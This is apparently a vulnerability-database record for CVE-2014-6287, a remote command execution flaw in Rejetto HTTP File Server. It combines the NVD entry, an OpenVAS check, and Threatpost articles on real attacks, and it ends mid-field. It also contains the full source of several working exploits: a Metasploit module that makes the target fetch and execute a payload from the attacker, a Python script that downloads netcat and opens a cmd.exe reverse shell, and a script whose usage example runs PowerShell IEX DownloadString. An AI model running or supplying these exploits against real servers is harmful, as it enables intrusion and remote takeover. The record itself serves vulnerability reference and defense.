{"cve": [{"lastseen": "2020-12-09T19:58:26", "description": "The findMacroMarker function in parserLib.pas in Rejetto HTTP File Server (aks HFS or HttpFileServer) 2.3x before 2.3c allows remote attackers to execute arbitrary programs via a %00 sequence in a search action.", "edition": 6, "cvss3": {}, "published": "2014-10-07T10:55:00", "title": "CVE-2014-6287", "type": "cve", "cwe": ["CWE-94"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-6287"], "modified": "2020-11-30T18:15:00", "cpe": ["cpe:/a:rejetto:http_file_server:2.3b"], "id": "CVE-2014-6287", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-6287", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:rejetto:http_file_server:2.3b:*:*:*:*:*:*:*"]}], "packetstorm": [{"lastseen": "2016-12-05T22:24:25", "description": "", "published": "2014-10-08T00:00:00", "type": "packetstorm", "title": "Rejetto HttpFileServer Remote Command Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-6287"], "modified": "2014-10-08T00:00:00", "id": "PACKETSTORM:128593", "href": "https://packetstormsecurity.com/files/128593/Rejetto-HttpFileServer-Remote-Command-Execution.html", "sourceData": "`## \n# This module requires Metasploit: http//metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = ExcellentRanking \n \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::Remote::HttpServer \ninclude Msf::Exploit::EXE \ninclude Msf::Exploit::FileDropper \n \ndef initialize(info={}) \nsuper(update_info(info, \n'Name' => \"Rejetto HttpFileServer Remote Command Execution\", \n'Description' => %q{ \nRejetto HttpFileServer (HFS) is vulnerable to remote command execution attack due to a \npoor regex in the file ParserLib.pas. This module exploit the HFS scripting commands by \nusing '%00' to bypass the filtering. This module has been tested successfully on HFS 2.3b \nover Windows XP SP3, Windows 7 SP1 and Windows 8. \n}, \n'License' => MSF_LICENSE, \n'Author' => \n[ \n'Daniele Linguaglossa <danielelinguaglossa[at]gmail.com>', # orginal discovery \n'Muhamad Fadzil Ramli <mind1355[at]gmail.com>' # metasploit module \n], \n'References' => \n[ \n['CVE', '2014-6287'], \n['OSVDB', '111386'], \n['URL', 'http://seclists.org/bugtraq/2014/Sep/85'], \n['URL', 'http://www.rejetto.com/wiki/index.php?title=HFS:_scripting_commands'] \n], \n'Payload' => { 'BadChars' => \"\\x0d\\x0a\\x00\" }, \n'Platform' => 'win', \n'Targets' => \n[ \n[ 'Automatic', {} ], \n], \n'Privileged' => false, \n'Stance' => Msf::Exploit::Stance::Aggressive, \n'DisclosureDate' => \"Sep 11 2014\", \n'DefaultTarget' => 0)) \n \nregister_options( \n[ \nOptString.new('TARGETURI', [true, 'The path of the web application', '/']), \nOptInt.new('HTTPDELAY', [false, 'Seconds to wait before terminating web server', 10]), \n], self.class) \nend \n \ndef check \nres = send_request_raw({ \n'method' => 'GET', \n'uri' => '/' \n}) \n \nif res && res.headers['Server'] && res.headers['Server'] =~ /HFS ([\\d.]+)/ \nversion = $1 \nif Gem::Version.new(version) <= Gem::Version.new(\"2.3\") \nreturn Exploit::CheckCode::Detected \nelse \nreturn Exploit::CheckCode::Safe \nend \nelse \nreturn Exploit::CheckCode::Safe \nend \nend \n \ndef on_request_uri(cli, req) \nprint_status(\"#{peer} - Payload request received: #{req.uri}\") \nexe = generate_payload_exe \nvbs = Msf::Util::EXE.to_exe_vbs(exe) \nsend_response(cli, vbs, {'Content-Type' => 'application/octet-stream'}) \n# remove resource after serving 1st request as 'exec' execute 4x \n# during exploitation \nremove_resource(get_resource) \nend \n \ndef primer \nfile_name = rand_text_alpha(rand(10)+5) \nfile_ext = '.vbs' \nfile_full_name = file_name + file_ext \nvbs_path = \"%TEMP%\\\\#{file_full_name}\" \n \nvbs_code = \"Set x=CreateObject(\\\"Microsoft.XMLHTTP\\\")\\x0d\\x0a\" \nvbs_code << \"On Error Resume Next\\x0d\\x0a\" \nvbs_code << \"x.Open \\\"GET\\\",\\\"http://#{datastore['LHOST']}:#{datastore['SRVPORT']}#{get_resource}\\\",False\\x0d\\x0a\" \nvbs_code << \"If Err.Number <> 0 Then\\x0d\\x0a\" \nvbs_code << \"wsh.exit\\x0d\\x0a\" \nvbs_code << \"End If\\x0d\\x0a\" \nvbs_code << \"x.Send\\x0d\\x0a\" \nvbs_code << \"Execute x.responseText\" \n \npayloads = [ \n\"save|#{vbs_path}|#{vbs_code}\", \n\"exec|wscript.exe //B //NOLOGO #{vbs_path}\" \n] \n \nprint_status(\"Sending a malicious request to #{target_uri.path}\") \npayloads.each do |payload| \nsend_request_raw({ \n'method' => 'GET', \n'uri' => \"/?search=%00{.#{URI::encode(payload)}.}\" \n}) \nend \nregister_file_for_cleanup(vbs_path) \nend \n \ndef exploit \nbegin \nTimeout.timeout(datastore['HTTPDELAY']) { super } \nrescue Timeout::Error \n# When the server stops due to our timeout, this is raised \nend \nend \nend \n`\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/128593/rejetto_hfs_exec.rb.txt"}, {"lastseen": "2016-12-05T22:18:41", "description": "", "published": "2016-01-04T00:00:00", "type": "packetstorm", "title": "Rejetto HTTP File Server 2.3.x Remote Code Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-6287"], "modified": "2016-01-04T00:00:00", "id": "PACKETSTORM:135122", "href": "https://packetstormsecurity.com/files/135122/Rejetto-HTTP-File-Server-2.3.x-Remote-Code-Execution.html", "sourceData": "`#!/usr/bin/python \n# Exploit Title: HttpFileServer 2.3.x Remote Command Execution \n# Google Dork: intext:\"httpfileserver 2.3\" \n# Date: 04-01-2016 \n# Remote: Yes \n# Exploit Author: Avinash Kumar Thapa aka \"-Acid\" \n# Vendor Homepage: http://rejetto.com/ \n# Software Link: http://sourceforge.net/projects/hfs/ \n# Version: 2.3.x \n# Tested on: Windows Server 2008 , Windows 8, Windows 7 \n# CVE : CVE-2014-6287 \n# Description: You can use HFS (HTTP File Server) to send and receive files. \n# It's different from classic file sharing because it uses web technology to be more compatible with today's Internet. \n# It also differs from classic web servers because it's very easy to use and runs \"right out-of-the box\". Access your remote files, over the network. It has been successfully tested with Wine under Linux. \n \n#Usage : python Exploit.py <Target IP address> <Target Port Number> \n \n \nimport urllib2 \nimport sys \n \ntry: \ndef script_create(): \nurllib2.urlopen(\"http://\"+sys.argv[1]+\":\"+sys.argv[2]+\"/?search=%00{.+\"+save+\".}\") \n \ndef execute_script(): \nurllib2.urlopen(\"http://\"+sys.argv[1]+\":\"+sys.argv[2]+\"/?search=%00{.+\"+exe+\".}\") \n \ndef nc_run(): \nurllib2.urlopen(\"http://\"+sys.argv[1]+\":\"+sys.argv[2]+\"/?search=%00{.+\"+exe1+\".}\") \n \nip_addr = \"192.168.44.128\" #local IP address \nlocal_port = \"443\" # Local Port number \nvbs = \"C:\\Users\\Public\\script.vbs|dim%20xHttp%3A%20Set%20xHttp%20%3D%20createobject(%22Microsoft.XMLHTTP%22)%0D%0Adim%20bStrm%3A%20Set%20bStrm%20%3D%20createobject(%22Adodb.Stream%22)%0D%0AxHttp.Open%20%22GET%22%2C%20%22http%3A%2F%2F\"+ip_addr+\"%2Fnc.exe%22%2C%20False%0D%0AxHttp.Send%0D%0A%0D%0Awith%20bStrm%0D%0A%20%20%20%20.type%20%3D%201%20%27%2F%2Fbinary%0D%0A%20%20%20%20.open%0D%0A%20%20%20%20.write%20xHttp.responseBody%0D%0A%20%20%20%20.savetofile%20%22C%3A%5CUsers%5CPublic%5Cnc.exe%22%2C%202%20%27%2F%2Foverwrite%0D%0Aend%20with\" \nsave= \"save|\" + vbs \nvbs2 = \"cscript.exe%20C%3A%5CUsers%5CPublic%5Cscript.vbs\" \nexe= \"exec|\"+vbs2 \nvbs3 = \"C%3A%5CUsers%5CPublic%5Cnc.exe%20-e%20cmd.exe%20\"+ip_addr+\"%20\"+local_port \nexe1= \"exec|\"+vbs3 \nscript_create() \nexecute_script() \nnc_run() \nexcept: \nprint \"\"\"[.]Something went wrong..! \nUsage is :[.] python exploit.py <Target IP address> <Target Port Number> \nDon't forgot to change the Local IP address and Port number on the script\"\"\" \n \n`\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/135122/rejettohttpserver-exec.txt"}, {"lastseen": "2016-12-05T22:13:29", "description": "", "published": "2014-09-12T00:00:00", "type": "packetstorm", "title": "HttpFileServer 2.3.x Remote Command Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-6287"], "modified": "2014-09-12T00:00:00", "id": "PACKETSTORM:128243", "href": "https://packetstormsecurity.com/files/128243/HttpFileServer-2.3.x-Remote-Command-Execution.html", "sourceData": "`Affected software: http://sourceforge.net/projects/hfs/ \nVersion : 2.3x \n# Exploit Title: HttpFileServer 2.3.x Remote Command Execution \n# Google Dork: intext:\"httpfileserver 2.3\" \n# Date: 11-09-2014 \n# Remote: Yes \n# Exploit Author: Daniele Linguaglossa \n# Vendor Homepage: http://rejetto.com/ \n# Software Link: http://sourceforge.net/projects/hfs/ \n# Version: 2.3.x \n# Tested on: Windows Server 2008 , Windows 8, Windows 7 \n# CVE : CVE-2014-6287 \n \nissue exists due to a poor regex in the file ParserLib.pas \n \n \nfunction findMacroMarker(s:string; ofs:integer=1):integer; \nbegin result:=reMatch(s, '\\{[.:]|[.:]\\}|\\|', 'm!', ofs) end; \n \n \nit will not handle null byte so a request to \n \nhttp://localhost:80/search=%00{.exec|cmd.} \n \nwill stop regex from parse macro , and macro will be executed and remote code injection happen. \n`\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/128243/httpfileserver-exec.txt"}, {"lastseen": "2020-11-30T16:03:52", "description": "", "published": "2020-11-29T00:00:00", "type": "packetstorm", "title": "Rejetto HttpFileServer 2.3.x Remote Command Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-6287"], "modified": "2020-11-29T00:00:00", "id": "PACKETSTORM:160264", "href": "https://packetstormsecurity.com/files/160264/Rejetto-HttpFileServer-2.3.x-Remote-Command-Execution.html", "sourceData": "`# Exploit Title: Rejetto HttpFileServer 2.3.x - Remote Command Execution (3) \n# Google Dork: intext:\"httpfileserver 2.3\" \n# Date: 28-11-2020 \n# Remote: Yes \n# Exploit Author: \u00d3scar Andreu \n# Vendor Homepage: http://rejetto.com/ \n# Software Link: http://sourceforge.net/projects/hfs/ \n# Version: 2.3.x \n# Tested on: Windows Server 2008 , Windows 8, Windows 7 \n# CVE : CVE-2014-6287 \n \n#!/usr/bin/python3 \n \n# Usage : python3 Exploit.py <RHOST> <Target RPORT> <Command> \n# Example: python3 HttpFileServer_2.3.x_rce.py 10.10.10.8 80 \"c:\\windows\\SysNative\\WindowsPowershell\\v1.0\\powershell.exe IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.4/shells/mini-reverse.ps1')\" \n \nimport urllib3 \nimport sys \nimport urllib.parse \n \ntry: \nhttp = urllib3.PoolManager() \nurl = f'http://{sys.argv[1]}:{sys.argv[2]}/?search=%00{{.+exec|{urllib.parse.quote(sys.argv[3])}.}}' \nprint(url) \nresponse = http.request('GET', url) \n \nexcept Exception as ex: \nprint(\"Usage: python3 HttpFileServer_2.3.x_rce.py RHOST RPORT command\") \nprint(ex) \n \n`\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://packetstormsecurity.com/files/download/160264/HttpFileServer_2.3.x_rce.py.txt"}], "exploitpack": [{"lastseen": "2020-04-01T19:04:45", "description": "\nRejetto HTTP File Server (HFS) 2.3.x - Remote Command Execution (1)", "edition": 1, "published": "2014-09-15T00:00:00", "title": "Rejetto HTTP File Server (HFS) 2.3.x - Remote Command Execution (1)", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-6287"], "modified": "2014-09-15T00:00:00", "id": "EXPLOITPACK:A6E51CB06A5AB6562CC6D5A235ECDE13", "href": "", "sourceData": "# Exploit Title: HttpFileServer 2.3.x Remote Command Execution\n# Google Dork: intext:\"httpfileserver 2.3\"\n# Date: 11-09-2014\n# Remote: Yes\n# Exploit Author: Daniele Linguaglossa\n# Vendor Homepage: http://rejetto.com/\n# Software Link: http://sourceforge.net/projects/hfs/\n# Version: 2.3.x\n# Tested on: Windows Server 2008 , Windows 8, Windows 7\n# CVE : CVE-2014-6287\n\nissue exists due to a poor regex in the file ParserLib.pas\n\n\nfunction findMacroMarker(s:string; ofs:integer=1):integer;\nbegin result:=reMatch(s, '\\{[.:]|[.:]\\}|\\|', 'm!', ofs) end;\n\n\nit will not handle null byte so a request to\n\nhttp://localhost:80/?search=%00{.exec|cmd.}\n\nwill stop regex from parse macro , and macro will be executed and remote code injection happen.\n\n\n## EDB Note: This vulnerability will run the payload multiple times simultaneously. \n## Make sure to take this into consideration when crafting your payload (and/or listener).", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-04-01T19:04:45", "description": "\nRejetto HTTP File Server (HFS) 2.3.x - Remote Command Execution (2)", "edition": 1, "published": "2016-01-04T00:00:00", "title": "Rejetto HTTP File Server (HFS) 2.3.x - Remote Command Execution (2)", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-6287"], "modified": "2016-01-04T00:00:00", "id": "EXPLOITPACK:A39709063C426496F984E8852560BBFF", "href": "", "sourceData": "#!/usr/bin/python\n# Exploit Title: HttpFileServer 2.3.x Remote Command Execution\n# Google Dork: intext:\"httpfileserver 2.3\"\n# Date: 04-01-2016\n# Remote: Yes\n# Exploit Author: Avinash Kumar Thapa aka \"-Acid\"\n# Vendor Homepage: http://rejetto.com/\n# Software Link: http://sourceforge.net/projects/hfs/\n# Version: 2.3.x\n# Tested on: Windows Server 2008 , Windows 8, Windows 7\n# CVE : CVE-2014-6287\n# Description: You can use HFS (HTTP File Server) to send and receive files.\n#\t It's different from classic file sharing because it uses web technology to be more compatible with today's Internet.\n#\t It also differs from classic web servers because it's very easy to use and runs \"right out-of-the box\". Access your remote files, over the network. It has been successfully tested with Wine under Linux. \n \n#Usage : python Exploit.py <Target IP address> <Target Port Number>\n\n#EDB Note: You need to be using a web server hosting netcat (http://<attackers_ip>:80/nc.exe). \n# You may need to run it multiple times for success!\n\n\nimport urllib2\nimport sys\n\ntry:\n\tdef script_create():\n\t\turllib2.urlopen(\"http://\"+sys.argv[1]+\":\"+sys.argv[2]+\"/?search=%00{.+\"+save+\".}\")\n\n\tdef execute_script():\n\t\turllib2.urlopen(\"http://\"+sys.argv[1]+\":\"+sys.argv[2]+\"/?search=%00{.+\"+exe+\".}\")\n\n\tdef nc_run():\n\t\turllib2.urlopen(\"http://\"+sys.argv[1]+\":\"+sys.argv[2]+\"/?search=%00{.+\"+exe1+\".}\")\n\n\tip_addr = \"192.168.44.128\" #local IP address\n\tlocal_port = \"443\" # Local Port number\n\tvbs = \"C:\\Users\\Public\\script.vbs|dim%20xHttp%3A%20Set%20xHttp%20%3D%20createobject(%22Microsoft.XMLHTTP%22)%0D%0Adim%20bStrm%3A%20Set%20bStrm%20%3D%20createobject(%22Adodb.Stream%22)%0D%0AxHttp.Open%20%22GET%22%2C%20%22http%3A%2F%2F\"+ip_addr+\"%2Fnc.exe%22%2C%20False%0D%0AxHttp.Send%0D%0A%0D%0Awith%20bStrm%0D%0A%20%20%20%20.type%20%3D%201%20%27%2F%2Fbinary%0D%0A%20%20%20%20.open%0D%0A%20%20%20%20.write%20xHttp.responseBody%0D%0A%20%20%20%20.savetofile%20%22C%3A%5CUsers%5CPublic%5Cnc.exe%22%2C%202%20%27%2F%2Foverwrite%0D%0Aend%20with\"\n\tsave= \"save|\" + vbs\n\tvbs2 = \"cscript.exe%20C%3A%5CUsers%5CPublic%5Cscript.vbs\"\n\texe= \"exec|\"+vbs2\n\tvbs3 = \"C%3A%5CUsers%5CPublic%5Cnc.exe%20-e%20cmd.exe%20\"+ip_addr+\"%20\"+local_port\n\texe1= \"exec|\"+vbs3\n\tscript_create()\n\texecute_script()\n\tnc_run()\nexcept:\n\tprint \"\"\"[.]Something went wrong..!\n\tUsage is :[.] python exploit.py <Target IP address> <Target Port Number>\n\tDon't forgot to change the Local IP address and Port number on the script\"\"\"", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "openvas": [{"lastseen": "2019-05-29T18:35:32", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-6287"], "description": "This host is running HTTP File Server\n and is prone to remote command execution vulnerability.", "modified": "2018-09-19T00:00:00", "published": "2016-01-11T00:00:00", "id": "OPENVAS:1361412562310806814", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310806814", "type": "openvas", "title": "HTTP File Server Remote Command Execution Vulnerability-02 Jan16", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_http_file_server_mult_vuln02_jan16.nasl 11473 2018-09-19 11:21:09Z asteins $\n#\n# HTTP File Server Remote Command Execution Vulnerability-02 Jan16\n#\n# Authors:\n# Kashinath T <tkashinath@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:httpfilesever:hfs\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.806814\");\n script_version(\"$Revision: 11473 $\");\n script_cve_id(\"CVE-2014-6287\");\n script_bugtraq_id(69782);\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-09-19 13:21:09 +0200 (Wed, 19 Sep 2018) $\");\n script_tag(name:\"creation_date\", value:\"2016-01-11 15:22:37 +0530 (Mon, 11 Jan 2016)\");\n script_name(\"HTTP File Server Remote Command Execution Vulnerability-02 Jan16\");\n\n script_tag(name:\"summary\", value:\"This host is running HTTP File Server\n and is prone to remote command execution vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The flaw is due to an improper\n neutralization of Null byte or NUL character\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an\n attacker to execute arbitrary code by uploading a file with certain invalid\n UTF-8 byte sequences that are interpreted as executable macro symbols.\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n\n script_tag(name:\"affected\", value:\"HttpFileServer version 2.3g and prior.\");\n\n script_tag(name:\"solution\", value:\"No known solution was made available for at least one year since the disclosure\n of this vulnerability. Likely none will be provided anymore. General solution options are to upgrade to a newer\n release, disable respective features, remove the product or replace the product by another one.\");\n\n script_tag(name:\"solution_type\", value:\"WillNotFix\");\n\n script_xref(name:\"URL\", value:\"http://packetstormsecurity.com/files/128593\");\n script_xref(name:\"URL\", value:\"https://www.kb.cert.org/vuls/id/251276\");\n script_xref(name:\"URL\", value:\"https://www.exploit-db.com/exploits/39161/\");\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_category(ACT_GATHER_INFO);\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_http_file_server_detect.nasl\");\n script_mandatory_keys(\"hfs/Installed\");\n script_require_ports(\"Services/www\", 80);\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"version_func.inc\");\n\ninclude(\"host_details.inc\");\n\nif(!hfsPort = get_app_port(cpe:CPE)){\n exit(0);\n}\n\nif(!hfsVer = get_app_version(cpe:CPE, port:hfsPort)){\n exit(0);\n}\n\nif(version_is_less_equal(version:hfsVer, test_version:\"2.3g\"))\n{\n report = 'Installed Version: ' + hfsVer + '\\n' +\n 'Fixed Version: Not available' + '\\n';\n security_message(port:hfsPort, data:report);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "threatpost": [{"lastseen": "2018-10-06T22:57:19", "bulletinFamily": "info", "cvelist": ["CVE-2014-6287"], "description": "Apparently no vulnerability is too small, no application too obscure, to escape a hacker\u2019s notice.\n\nA honeypot run by Trustwave\u2019s SpiderLabs research team recently snared an automated attack targeting users of the open source Rejetto HTTP File Server (Rejetto HFS). Someone was trying to exploit a vulnerability\u2014which has since been patched\u2014and install the well-known distributed denial-of-service tool IptabLes (unrelated to the Linux tool), also known as IptabLex.\n\nRejetto HFS has been downloaded more than 24,000 times in the last seven days and according to the project\u2019s website has an estimated 12,500 users and is used as a file-sharing application as well as a webserver. It also runs on Wine, the Windows emulator for Linux systems.\n\n\u201cThis is just one snapshot, one request. This is one example to extrapolate and take a higher level view; there\u2019s likely a lot more activity out there,\u201d said Ryan Barnett, SpiderLabs lead researcher.\n\nIt\u2019s likely the attackers have simply incorporated this exploit into a larger attack platform, Barnett said.\n\n\u201cThat\u2019s the value of honeypots, spotting automated tools scanning the Internet shot-gunning exploits, and hoping it works,\u201d Barnett said.\n\nThe [exploit](<https://www.trustwave.com/Resources/SpiderLabs-Blog/-Honeypot-Alert--FHS-Null-Byte-Attack-%28CVE-2014-6287%29-Attempts-to-Install-DDoS-Malware-%28Iptablex%29/?page=1&year=0&month=0>), sent from a possible compromised IP address in China, was targeting [CVE-2014-6287](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6287>), a remote code execution bug in Rejetto. Specifically, the vulnerability affects Rejetto versions prior to 2.3c; the vulnerability is in the findMacroMarker function. Barnett said the exploit relies on a null byte character to trigger the attack code, which is written in Microsoft VBScript.\n\nOnce the exploit executes, it tries to connect to a pair of IP addresses hosted in Paris (123[.]108.109.100 and 178[.]33.196.164) on three ports: 80 (HTTP); 53 (DNS); and 443 (HTTPS). Barnett said only 178[.]33.196.164 remains online and is a malware repository responding to XML HTTP Requests (XHR) from the exploit.\n\n> The exploit tries to infect Rejetto users with the IptabLes DDoS tool. via @Threatpost\n> \n> [Tweet](<https://twitter.com/share?url=https%3A%2F%2Fthreatpost.com%2Fddos-exploit-targets-open-source-rejetto-hfs%2F111286%2F&text=The+exploit+tries+to+infect+Rejetto+users+with+the+IptabLes+DDoS+tool.+via+%40Threatpost>)\n\nA file called getsetup.exe is sent to the compromised server along with another executable, ko.exe, which drops IptabLes. Barnett said detection rates are high for the hash of getsetup.exe. IptabLes is a troublesome DDoS tool, capable of synflood and DNSflood attacks. It installs itself into boot for persistence, according to the SpiderLabs research, which added that IptabLes has been widely reported targeting Linux and Unix servers.\n\nThe vulnerability being targeted was submitted last September.\n\n\u201cIt\u2019s not very sophisticated, and a lot of times these types of attacks don\u2019t have to be,\u201d Barnett said. \u201cThese guys are concerned with scale because they\u2019re running botnets. What makes botnets so nice to the criminals running them is that they don\u2019t care to be stealthy. They can send attacks blindly, and if they\u2019re shut down, they just move on.\u201d\n", "modified": "2015-03-02T20:23:10", "published": "2015-02-26T10:01:53", "id": "THREATPOST:F310549B940194F4054B8267501DD1D8", "href": "https://threatpost.com/ddos-exploit-targets-open-source-rejetto-hfs/111286/", "type": "threatpost", "title": "DDoS Exploit Targets Open Source Rejetto HFS", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2020-10-16T22:40:45", "bulletinFamily": "info", "cvelist": ["CVE-2014-6287", "CVE-2017-0144", "CVE-2017-0145", "CVE-2017-10271", "CVE-2017-8464", "CVE-2017-9791", "CVE-2018-20062", "CVE-2019-9081"], "description": "Security experts have identified a self-propagating malware, dubbed Lucifer, that targets Windows systems with cryptojacking and distributed denial-of-service (DDoS) attacks.\n\nThe never-before-seen malware initially tries to infect PCs by bombarding them with exploits in hopes of taking advantage of an \u201cexhaustive\u201d list of unpatched vulnerabilities. While patches for all the critical and high-severity bugs exist, the various companies impacted by the malware had not applied the fixes.\n\n\u201cLucifer is a new hybrid of cryptojacking and DDoS malware variant that leverages old vulnerabilities to spread and perform malicious activities on Windows platforms,\u201d said researchers with Palo Alto Networks\u2019 Unit 42 team, on[ Wednesday in a blog post](<https://unit42.paloaltonetworks.com/lucifer-new-cryptojacking-and-ddos-hybrid-malware/>). \u201cApplying the updates and patches to the affected software are strongly advised.\u201d\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nThe vulnerabilities targeted by Lucifer include Rejetto HTTP File Server ([CVE-2014-6287](<https://nvd.nist.gov/vuln/detail/CVE-2014-6287>)), Oracle Weblogic ([CVE-2017-10271](<https://nvd.nist.gov/vuln/detail/CVE-2017-10271>)), ThinkPHP RCE ([CVE-2018-20062](<https://nvd.nist.gov/vuln/detail/CVE-2018-20062>)), Apache Struts ([CVE-2017-9791](<https://nvd.nist.gov/vuln/detail/CVE-2017-9791>)), Laravel framework [CVE-2019-9081](<https://nvd.nist.gov/vuln/detail/CVE-2019-9081>)), and Microsoft Windows ([CVE-2017-0144](<https://nvd.nist.gov/vuln/detail/CVE-2017-0144>), [CVE-2017-0145](<https://nvd.nist.gov/vuln/detail/CVE-2017-0145>), and [CVE-2017-8464](<https://nvd.nist.gov/vuln/detail/CVE-2017-8464>)).\n\nAfter successfully exploiting these flaws, the attacker then connects to the command-and-control (C2) server and executes arbitrary commands on the vulnerable device, said researchers. These commands include performing a TCP, UDP or HTTP [DoS attack](<https://threatpost.com/massive-ddos-amazon-telecom-infrastructure/150096/>). Other commands allow the malware to drop an [XMRig miner](<https://threatpost.com/new-cryptominer-distributes-xmrig-in-aggressive-attacks/132027/>) and launch [cryptojacking attacks](<https://threatpost.com/hackers-exploit-critical-flaw-in-ghost-platform-with-cryptojacking-attack/155431/>), as well as collecting interface info and sending the miner status to the C2. Researchers say that as of Wednesday, the XMR wallet has paid 0.493527 XMR (approximately $32).\n\nThe malware is also capable of self-propagation through various methods.\n\nIt scans either for open instances of TCP port 1433 or Remote Procedure Call (RPC) port 135. If either of these are open, the malware attempts to brute-force the login using a default administrator username and an embedded password list (a full list of the passwords used can be found on Unit 42\u2019s analysis). It then copies and runs the malware binary on the remote host upon successful authentication.\n\nIn addition to brute-forcing credentials, the malware leverages exploitation for self-propagation. If the Server Message Block (SMB) protocol (a network file sharing protocol) is open, Lucifer executes several backdoors. These include the [EternalBlue](<https://threatpost.com/tag/eternalblue/>), [EternalRomance](<https://threatpost.com/eternalromance-exploit-found-in-bad-rabbit-ransomware/128645/>), and [DoublePulsar](<https://threatpost.com/nsas-doublepulsar-kernel-exploit-in-use-internet-wide/125165/>) exploits.\n\nOnce these three exploits have been used, the certutil utility is then used to propagate the malware. Certutil.exe is a command-line program, installed as part of Certificate Services, that can be used to dump and display certification authority (CA) configuration information, configure Certificate Services, backup and restore CA components, and verify certificates.\n\nLucifer has been discovered in a series of recent attacks that are still ongoing. The first wave occurred on June 10. The attackers then resumed their campaign on June 11 with an upgraded version of the malware. Researchers say these updates include the addition of an anti-sandbox capability, an anti-debugger technique, and new checks for device drivers, DLLs and virtual devices.\n\nThese added capabilities show that the malware is growing in sophistication, researchers warn. They say, enterprises can protect themselves with simply security measures such as applying patches and strengthening passwords.\n\n\u201cWhile the vulnerabilities abused and attack tactics leveraged by this malware are nothing original, they once again deliver a message to all organizations, reminding them why it\u2019s utterly important to keep systems up-to-date whenever possible, eliminate weak credentials, and have a layer of defenses for assurance,\u201d stressed researchers.\n\n_This article was updated on June 25 to reflect the accurate conversion of XMR to USD._\n\n**_BEC and enterprise email fraud is surging, but DMARC can help \u2013 if it\u2019s done right. On July 15 at 2 p.m. ET, join Valimail Global Technical Director Steve Whittle and Threatpost for a [FREE webinar](<https://attendee.gotowebinar.com/register/441045308082589963?source=art>), \u201cDMARC: 7 Common Business Email Mistakes.\u201d This technical \u201cbest practices\u201d session will cover constructing, configuring, and managing email authentication protocols to ensure your organization is protected. [Click here to register](<https://attendee.gotowebinar.com/register/441045308082589963?source=art>) for this Threatpost webinar, sponsored by Valimail._**\n", "modified": "2020-06-24T21:20:16", "published": "2020-06-24T21:20:16", "id": "THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA", "href": "https://threatpost.com/self-propagating-lucifer-malware-targets-windows-systems/156883/", "type": "threatpost", "title": "Self-Propagating Lucifer Malware Targets Windows Systems", "cvss": {"score": 9.3, "vector": 